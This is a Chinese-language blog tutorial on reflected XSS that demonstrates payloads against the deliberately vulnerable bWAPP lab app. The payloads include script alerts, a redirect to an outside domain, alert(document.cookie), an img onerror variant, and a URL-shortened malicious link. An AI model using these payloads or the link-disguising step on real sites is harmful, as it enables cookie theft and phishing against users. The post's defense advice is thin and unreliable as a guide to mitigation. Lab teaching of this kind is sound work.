WEB安全-反射型XSS漏洞原理和实践

XSS(跨站脚本攻击)

定义

浏览器将用户输入的内容,当做脚本执行,执行了恶意的功能,这种针对用户浏览器的攻击即跨站脚本攻击。

类型

主要分为三种类型:

  • 反射型

  • 存储型

  • DOM 型

XSS 危害

  • 盗取 Cookie
  • 盗取账户
  • 恶意软件下载
  • 键盘记录
  • 广告引流等等 JavaScript 能够写出的任意恶意功能

反射型 XSS

应用程序或 API 包括未经验证或未经转义的用户输入, 直接作为HTML 输出的一部分。一个成功的攻击可以让攻击者在受害者的浏览器中执行任意的 HTML 和 JavaScript 。

特点:非持久化,必须用户点击带有特定参数的链接才能引起。

影响范围:仅执行脚本的用户。

示例

SkyMacBookPro:~ demon$ docker run -d -p 0.0.0.0:8901:80 raesene/bwapp
image-20210816101509815 
<script>alert("hello world")</script>

image-20210816101253902

image-20210816102801637

<script>alert("点击此处修复");location.href="http://ceshis.com"</script>

image-20210816101616134

image-20210816103104373

<script>alert(document.cookie)</script>

image-20210816101711093

长网址缩短 (https://www.ft12.com)

http://192.168.43.120:8901/xss_get.php?firstname=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&lastname=1&form=submit

image-20210816103631157

http://33h.co/wr3wj

image-20210816103718366

image-20210816103859911

image-20210816105505263

image-20210816112127046

/><img src="111.png" onerror="alert(document.cookie)">

image-20210816112516272

防御措施

反射型 XSS 的限制与防御,危害范围相对较小,多为一次点击触发一次,对陌生的链接,不要随意点开。

关于我

博客:www.weikeu.com
添加微信 734791767,加入微信学习群。

posted @ 2021-09-08 17:20  走进测试  阅读(464)  评论(0)    收藏  举报